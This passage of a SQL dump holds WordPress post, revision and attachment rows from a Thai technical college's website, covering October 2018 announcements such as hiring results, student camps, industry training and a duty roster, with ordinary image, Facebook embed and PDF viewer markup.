(4142, 3, '2018-10-18 18:18:30', '2018-10-18 11:18:30', '', '1539860875337', '', 'inherit', 'closed', 'closed', '', '1539860875337-2', '', '', '2018-10-18 18:18:30', '2018-10-18 11:18:30', '', 4139, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/1539860875337-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(4146, 3, '2018-10-18 18:26:46', '2018-10-18 11:26:46', '', 'ประกาศ ผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน 9 อัตรา', '', 'inherit', 'closed', 'closed', '', '4139-revision-v1', '', '', '2018-10-18 18:26:46', '2018-10-18 11:26:46', '', 4139, 'http://www.technicrayong.ac.th/4139-revision-v1/', 0, 'revision', '', 0),
(4148, 3, '2018-10-18 18:44:11', '2018-10-18 11:44:11', '<img class=\"aligncenter size-full wp-image-4142\" src=\"/wp-content/uploads/2018/10/1539860875337-1.jpg\" alt=\"\" width=\"1108\" height=\"1477\" /> <img class=\"aligncenter size-full wp-image-4141\" src=\"/wp-content/uploads/2018/10/1539860879873.jpg\" alt=\"\" width=\"1108\" height=\"1477\" />', 'ประกาศ ผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน 9 อัตรา', '', 'inherit', 'closed', 'closed', '', '4139-autosave-v1', '', '', '2018-10-18 18:44:11', '2018-10-18 11:44:11', '', 4139, 'http://www.technicrayong.ac.th/4139-autosave-v1/', 0, 'revision', '', 0),
(4149, 3, '2018-10-18 18:44:23', '2018-10-18 11:44:23', '<img class=\"aligncenter size-full wp-image-4142\" src=\"/wp-content/uploads/2018/10/1539860875337-1.jpg\" alt=\"\" width=\"1108\" height=\"1477\" /> <img class=\"aligncenter size-full wp-image-4141\" src=\"/wp-content/uploads/2018/10/1539860879873.jpg\" alt=\"\" width=\"1108\" height=\"1477\" />', 'ประกาศ ผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน 9 อัตรา', '', 'inherit', 'closed', 'closed', '', '4139-revision-v1', '', '', '2018-10-18 18:44:23', '2018-10-18 11:44:23', '', 4139, 'http://www.technicrayong.ac.th/4139-revision-v1/', 0, 'revision', '', 0),
(4150, 3, '2018-10-22 10:00:26', '2018-10-22 03:00:26', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.692793217763536&type=3\"><img class=\"aligncenter size-full wp-image-4151\" src=\"/wp-content/uploads/2018/10/22-10-2561-9-36-07.jpg\" alt=\"\" width=\"456\" height=\"610\" /></a>', 'วิทยาลัยเทคนิคระยอง จัดกิจกรรมโครงการเดินทางไกลและอยู่ค่ายพักแรมลูกเสือ เนตรนารีวิสามัญ ประจำปีการศึกษา 2561 ในระหว่างวันที่ 13-15 ตุลาคม 2561 ณ ค่ายลูกเสือวชิราวุธ อำเภอศรีราชา จังหวัดชลบุรี', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b8%88%e0%b8%b1-3', '', '', '2018-10-22 10:00:26', '2018-10-22 03:00:26', '', 0, 'http://www.technicrayong.ac.th/?p=4150', 269, 'post', '', 0),
(4151, 3, '2018-10-22 09:33:29', '2018-10-22 02:33:29', '', '22-10-2561 9-36-07', '', 'inherit', 'closed', 'closed', '', '22-10-2561-9-36-07', '', '', '2018-10-22 09:33:29', '2018-10-22 02:33:29', '', 4150, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/22-10-2561-9-36-07.jpg', 0, 'attachment', 'image/jpeg', 0),
(4152, 3, '2018-10-22 09:56:51', '2018-10-22 02:56:51', '', '44075853_692795094430015_3937603537113972736_o', '', 'inherit', 'closed', 'closed', '', '44075853_692795094430015_3937603537113972736_o', '', '', '2018-10-22 09:56:51', '2018-10-22 02:56:51', '', 4150, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/44075853_692795094430015_3937603537113972736_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4153, 3, '2018-10-22 10:00:26', '2018-10-22 03:00:26', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.692793217763536&type=3\"><img class=\"aligncenter size-full wp-image-4151\" src=\"/wp-content/uploads/2018/10/22-10-2561-9-36-07.jpg\" alt=\"\" width=\"456\" height=\"610\" /></a>', 'วิทยาลัยเทคนิคระยอง จัดกิจกรรมโครงการเดินทางไกลและอยู่ค่ายพักแรมลูกเสือ เนตรนารีวิสามัญ ประจำปีการศึกษา 2561 ในระหว่างวันที่ 13-15 ตุลาคม 2561 ณ ค่ายลูกเสือวชิราวุธ อำเภอศรีราชา จังหวัดชลบุรี', '', 'inherit', 'closed', 'closed', '', '4150-revision-v1', '', '', '2018-10-22 10:00:26', '2018-10-22 03:00:26', '', 4150, 'http://www.technicrayong.ac.th/4150-revision-v1/', 0, 'revision', '', 0),
(4154, 3, '2018-10-22 10:18:20', '2018-10-22 03:18:20', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D693351171041074%26id%3D100010985913485&width=500\" width=\"500\" height=\"800\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง จัดโครงการปฐมนิเทศนักเรียน นักศึกษา ระดับชั้น ปวช. และ ปวส. ที่ออกฝึกงาน ระหว่างวันที่ 22 ตุลาคม 2561 ถึง วันที่ 15 กุมภาพันธ์ 2562 เพื่อให้มีประสบการณ์จริงในการประกอบอาชีพตรงตามสาขาที่เรียนมา และทราบถึงวัตถุประสงค์ในการจัดโครงการฯ รวมไปถึงการบรรยายพิเศษให้กับนักเรียน นักศึกษาก่อนออกฝึกงาน ณ อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b8%88%e0%b8%b1-4', '', '', '2018-10-22 10:18:20', '2018-10-22 03:18:20', '', 0, 'http://www.technicrayong.ac.th/?p=4154', 268, 'post', '', 0),
(4155, 3, '2018-10-22 10:17:54', '2018-10-22 03:17:54', '', '44306996_693349281041263_5160132155052916736_o', '', 'inherit', 'closed', 'closed', '', '44306996_693349281041263_5160132155052916736_o', '', '', '2018-10-22 10:17:54', '2018-10-22 03:17:54', '', 4154, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/44306996_693349281041263_5160132155052916736_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4156, 3, '2018-10-22 10:18:20', '2018-10-22 03:18:20', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D693351171041074%26id%3D100010985913485&width=500\" width=\"500\" height=\"800\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง จัดโครงการปฐมนิเทศนักเรียน นักศึกษา ระดับชั้น ปวช. และ ปวส. ที่ออกฝึกงาน ระหว่างวันที่ 22 ตุลาคม 2561 ถึง วันที่ 15 กุมภาพันธ์ 2562 เพื่อให้มีประสบการณ์จริงในการประกอบอาชีพตรงตามสาขาที่เรียนมา และทราบถึงวัตถุประสงค์ในการจัดโครงการฯ รวมไปถึงการบรรยายพิเศษให้กับนักเรียน นักศึกษาก่อนออกฝึกงาน ณ อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4154-revision-v1', '', '', '2018-10-22 10:18:20', '2018-10-22 03:18:20', '', 4154, 'http://www.technicrayong.ac.th/4154-revision-v1/', 0, 'revision', '', 0),
(4157, 3, '2018-10-22 10:22:59', '2018-10-22 03:22:59', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D694165574292967%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ 19 ตุลาคม 2561ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง มอบเกียรติบัตรให้แก่นักเรียน นักศึกษา และผู้ควบคุมการแสดง ที่เข้าร่วมการประกวดการแข่งขัน TO BE NUMBER ONE TEEN DANCERCISE RAYONG CHAMPIONSHIP 2018 (รุ่น Teenage) ซึ่งได้รับรางวัลรองชนะเลิศอันดับ 2 ในการจัดกิจกรรมรวมพลสมาชิก TO BE NUMBER ONE จังหวัดระยอง ประจำปีการศึกษา 2561 ในวันที่ 29 กันยายน 2561 ที่ผ่านมา ณโรงแรมสตาร์ จังหวัดระยอง พร้อมพบปะพูดคุยกับนักเรียน นักศึกษา ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-19-%e0%b8%95%e0%b8%b8%e0%b8%a5%e0%b8%b2%e0%b8%84%e0%b8%a1-2561%e0%b8%a7%e0%b9%88%e0%b8%b2%e0%b8%97', '', '', '2018-10-22 10:22:59', '2018-10-22 03:22:59', '', 0, 'http://www.technicrayong.ac.th/?p=4157', 267, 'post', '', 0),
(4158, 3, '2018-10-22 10:22:28', '2018-10-22 03:22:28', '', '44258733_694163074293217_2958671853452787712_o', '', 'inherit', 'closed', 'closed', '', '44258733_694163074293217_2958671853452787712_o', '', '', '2018-10-22 10:22:28', '2018-10-22 03:22:28', '', 4157, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/44258733_694163074293217_2958671853452787712_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4159, 3, '2018-10-22 10:22:59', '2018-10-22 03:22:59', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D694165574292967%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ 19 ตุลาคม 2561ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง มอบเกียรติบัตรให้แก่นักเรียน นักศึกษา และผู้ควบคุมการแสดง ที่เข้าร่วมการประกวดการแข่งขัน TO BE NUMBER ONE TEEN DANCERCISE RAYONG CHAMPIONSHIP 2018 (รุ่น Teenage) ซึ่งได้รับรางวัลรองชนะเลิศอันดับ 2 ในการจัดกิจกรรมรวมพลสมาชิก TO BE NUMBER ONE จังหวัดระยอง ประจำปีการศึกษา 2561 ในวันที่ 29 กันยายน 2561 ที่ผ่านมา ณโรงแรมสตาร์ จังหวัดระยอง พร้อมพบปะพูดคุยกับนักเรียน นักศึกษา ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4157-revision-v1', '', '', '2018-10-22 10:22:59', '2018-10-22 03:22:59', '', 4157, 'http://www.technicrayong.ac.th/4157-revision-v1/', 0, 'revision', '', 0),
(4160, 3, '2018-10-24 16:06:19', '2018-10-24 09:06:19', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D695783640797827%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บจก.เมสเชอร์เมนท์เอเชีย ตัวแทนจำหน่ายอุปกรณ์เครื่องมือวัดอุตสาหกรรม จัดอบรม พัฒนาอุตสาหกรรมปิโตรเคมี ผลิตไฟฟ้า กลั่นน้ำมันและก๊าซธรรมชาติในพื้นที่ระเบียงเศรษฐกิจภาคตะวันออก (EEC) หลักสูตรการใช้งาน Process Calibrator ระยะเวลาการฝึก 6 ชั่วโมง วันที่ 22 ตุลาคม 2561 ให้นักศึกษาสาขาวิชาเครื่องมือวัดและควบคุม ณ ศูนย์การเรียนรู้และปฏิบัติการระบบอัตโนมัติ บริษัท มิตซูบิชิ อีเล็คทริค แฟคทอรี่ ออโตเมชั่น(ประเทศไทย)จำกัด สถาบันการอาชีวศึกษาภาคตะวันออก วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%9a%e0%b8%88%e0%b8%81-%e0%b9%80%e0%b8%a1%e0%b8%aa%e0%b9%80%e0%b8%8a%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b9%80%e0%b8%a1%e0%b8%99%e0%b8%97%e0%b9%8c%e0%b9%80%e0%b8%ad%e0%b9%80%e0%b8%8a%e0%b8%b5%e0%b8%a2', '', '', '2018-10-24 16:06:19', '2018-10-24 09:06:19', '', 0, 'http://www.technicrayong.ac.th/?p=4160', 266, 'post', '', 0),
(4161, 3, '2018-10-24 16:06:02', '2018-10-24 09:06:02', '', '44597039_695783110797880_1367935727882469376_o', '', 'inherit', 'closed', 'closed', '', '44597039_695783110797880_1367935727882469376_o', '', '', '2018-10-24 16:06:02', '2018-10-24 09:06:02', '', 4160, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/44597039_695783110797880_1367935727882469376_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4162, 3, '2018-10-24 16:06:19', '2018-10-24 09:06:19', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D695783640797827%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บจก.เมสเชอร์เมนท์เอเชีย ตัวแทนจำหน่ายอุปกรณ์เครื่องมือวัดอุตสาหกรรม จัดอบรม พัฒนาอุตสาหกรรมปิโตรเคมี ผลิตไฟฟ้า กลั่นน้ำมันและก๊าซธรรมชาติในพื้นที่ระเบียงเศรษฐกิจภาคตะวันออก (EEC) หลักสูตรการใช้งาน Process Calibrator ระยะเวลาการฝึก 6 ชั่วโมง วันที่ 22 ตุลาคม 2561 ให้นักศึกษาสาขาวิชาเครื่องมือวัดและควบคุม ณ ศูนย์การเรียนรู้และปฏิบัติการระบบอัตโนมัติ บริษัท มิตซูบิชิ อีเล็คทริค แฟคทอรี่ ออโตเมชั่น(ประเทศไทย)จำกัด สถาบันการอาชีวศึกษาภาคตะวันออก วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4160-revision-v1', '', '', '2018-10-24 16:06:19', '2018-10-24 09:06:19', '', 4160, 'http://www.technicrayong.ac.th/4160-revision-v1/', 0, 'revision', '', 0),
(4163, 3, '2018-10-24 16:10:12', '2018-10-24 09:10:12', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D696296184079906%26id%3D100010985913485&width=500\" width=\"500\" height=\"789\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๒๓ ตุลาคม ๒๕๖๑ ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา เข้าร่วมพิธีบำเพ็ญกุศลและกิจกรรมน้อมรำลึก เนื่องในวันคล้ายวันสวรรคตพระบาทสมเด็จพระจุลจอมเกล้าเจ้าอยู่หัว รัชกาลที่ ๕ ในวันปิยมหาราช ณ สวนศรีเมือง จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%93-%e0%b8%95%e0%b8%b8%e0%b8%a5%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b9%92', '', '', '2018-10-24 16:10:12', '2018-10-24 09:10:12', '', 0, 'http://www.technicrayong.ac.th/?p=4163', 265, 'post', '', 0),
(4164, 3, '2018-10-24 16:09:45', '2018-10-24 09:09:45', '', '44573204_696295097413348_6138291680903692288_o', '', 'inherit', 'closed', 'closed', '', '44573204_696295097413348_6138291680903692288_o', '', '', '2018-10-24 16:09:45', '2018-10-24 09:09:45', '', 4163, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/44573204_696295097413348_6138291680903692288_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4165, 3, '2018-10-24 16:10:12', '2018-10-24 09:10:12', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D696296184079906%26id%3D100010985913485&width=500\" width=\"500\" height=\"789\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๒๓ ตุลาคม ๒๕๖๑ ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา เข้าร่วมพิธีบำเพ็ญกุศลและกิจกรรมน้อมรำลึก เนื่องในวันคล้ายวันสวรรคตพระบาทสมเด็จพระจุลจอมเกล้าเจ้าอยู่หัว รัชกาลที่ ๕ ในวันปิยมหาราช ณ สวนศรีเมือง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '4163-revision-v1', '', '', '2018-10-24 16:10:12', '2018-10-24 09:10:12', '', 4163, 'http://www.technicrayong.ac.th/4163-revision-v1/', 0, 'revision', '', 0),
(4166, 3, '2018-10-25 14:57:22', '2018-10-25 07:57:22', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.696742617368596%26type%3D3&width=500\" width=\"500\" height=\"840\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ร่วมกับ บริษัท มิซูบิชิ อีเล็คทริค แฟคตอรี่ ออโตเมชั่น (ประเทศไทย) จำกัด จัดโครงการอบรมใช้โปรแกรม GX Work3 ให้แก่ ครู นักเรียน นักศึกษา ระหว่างวันที่ 24-26 ตุลาคม 2561 ซึ่งเป็นโครงการที่ดีของสถาบันการอาชีวศึกษาภาคตะวันออก ที่ช่วยส่งเสริม พัฒนาบุคลากรในพื้นที่ระเบียงเศรษฐกิจภาคตะวันออก EEC เพื่อรองรับอุตสาหกรรมที่ใช้ระบบอัตโนมัติในอุตสาหกรรม 4.0 และเตรียมความพร้อมในการแข่งขันทักษะวิชาชีพ ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ในวันพุธที่ 24 ตุลาคม 2561 ณ ศูนย์การเรียนรู้และปฏิบัติระบบอัตโนมัติ อาคารวิจัยและพัฒนาการอาชีวศึกษา วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b8%a3%e0%b9%88-4', '', '', '2018-10-25 14:57:22', '2018-10-25 07:57:22', '', 0, 'http://www.technicrayong.ac.th/?p=4166', 264, 'post', '', 0),
(4167, 3, '2018-10-25 14:50:31', '2018-10-25 07:50:31', '', '44657145_696738594035665_5448529111511203840_o', '', 'inherit', 'closed', 'closed', '', '44657145_696738594035665_5448529111511203840_o', '', '', '2018-10-25 14:50:31', '2018-10-25 07:50:31', '', 4166, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/44657145_696738594035665_5448529111511203840_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4168, 3, '2018-10-25 14:57:22', '2018-10-25 07:57:22', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.696742617368596%26type%3D3&width=500\" width=\"500\" height=\"840\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ร่วมกับ บริษัท มิซูบิชิ อีเล็คทริค แฟคตอรี่ ออโตเมชั่น (ประเทศไทย) จำกัด จัดโครงการอบรมใช้โปรแกรม GX Work3 ให้แก่ ครู นักเรียน นักศึกษา ระหว่างวันที่ 24-26 ตุลาคม 2561 ซึ่งเป็นโครงการที่ดีของสถาบันการอาชีวศึกษาภาคตะวันออก ที่ช่วยส่งเสริม พัฒนาบุคลากรในพื้นที่ระเบียงเศรษฐกิจภาคตะวันออก EEC เพื่อรองรับอุตสาหกรรมที่ใช้ระบบอัตโนมัติในอุตสาหกรรม 4.0 และเตรียมความพร้อมในการแข่งขันทักษะวิชาชีพ ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ในวันพุธที่ 24 ตุลาคม 2561 ณ ศูนย์การเรียนรู้และปฏิบัติระบบอัตโนมัติ อาคารวิจัยและพัฒนาการอาชีวศึกษา วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4166-revision-v1', '', '', '2018-10-25 14:57:22', '2018-10-25 07:57:22', '', 4166, 'http://www.technicrayong.ac.th/4166-revision-v1/', 0, 'revision', '', 0),
(4169, 3, '2018-10-26 11:00:49', '2018-10-26 04:00:49', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%82%E0%B8%AD%E0%B9%80%E0%B8%8A%E0%B8%B4%E0%B8%8D%E0%B8%8A%E0%B8%A7%E0%B8%99%E0%B8%A3%E0%B9%88%E0%B8%A7%E0%B8%A1%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B8%B0%E0%B8%AF-%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81-%E0%B8%9B%E0%B8%B562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ขอเชิญชวนร่วมจัดทำคุณลักษณะเฉพาะครุภัณฑ์การศึกษาสาขาวิชาช่างยนต์, ช่างอิเล็กทรอนิกส์ ประจำปีงบประมาณ 2562', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%82%e0%b8%ad%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%8d%e0%b8%8a%e0%b8%a7%e0%b8%99%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%88%e0%b8%b1%e0%b8%94', '', '', '2018-10-26 11:00:49', '2018-10-26 04:00:49', '', 0, 'http://www.technicrayong.ac.th/?p=4169', 263, 'post', '', 0),
(4170, 3, '2018-10-26 11:00:12', '2018-10-26 04:00:12', '', 'ประกาศ ขอเชิญชวนร่วมจัดทำคุณลักษณะฯ ช่างยนต์, ช่างอิเล็ก ปี62', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%82%e0%b8%ad%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%8d%e0%b8%8a%e0%b8%a7%e0%b8%99%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%88%e0%b8%b1%e0%b8%94', '', '', '2018-10-26 11:00:12', '2018-10-26 04:00:12', '', 4169, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/ประกาศ-ขอเชิญชวนร่วมจัดทำคุณลักษณะฯ-ช่างยนต์-ช่างอิเล็ก-ปี62.pdf', 0, 'attachment', 'application/pdf', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4171, 3, '2018-10-26 11:00:49', '2018-10-26 04:00:49', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%82%E0%B8%AD%E0%B9%80%E0%B8%8A%E0%B8%B4%E0%B8%8D%E0%B8%8A%E0%B8%A7%E0%B8%99%E0%B8%A3%E0%B9%88%E0%B8%A7%E0%B8%A1%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B8%B0%E0%B8%AF-%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81-%E0%B8%9B%E0%B8%B562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ขอเชิญชวนร่วมจัดทำคุณลักษณะเฉพาะครุภัณฑ์การศึกษาสาขาวิชาช่างยนต์, ช่างอิเล็กทรอนิกส์ ประจำปีงบประมาณ 2562', '', 'inherit', 'closed', 'closed', '', '4169-revision-v1', '', '', '2018-10-26 11:00:49', '2018-10-26 04:00:49', '', 4169, 'http://www.technicrayong.ac.th/4169-revision-v1/', 0, 'revision', '', 0),
(4172, 3, '2018-10-26 14:12:13', '2018-10-26 07:12:13', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%9E%E0%B8%A4%E0%B8%A8%E0%B8%88%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A2%E0%B8%99-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนพฤศจิกายน 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a2%e0%b8%99', '', '', '2018-10-26 14:12:13', '2018-10-26 07:12:13', '', 0, 'http://www.technicrayong.ac.th/?p=4172', 262, 'post', '', 0),
(4173, 3, '2018-10-26 14:11:58', '2018-10-26 07:11:58', '', 'ตารางเวร เดือนพฤศจิกายน 2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a2%e0%b8%99', '', '', '2018-10-26 14:11:58', '2018-10-26 07:11:58', '', 4172, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/ตารางเวร-เดือนพฤศจิกายน-2561.pdf', 0, 'attachment', 'application/pdf', 0),
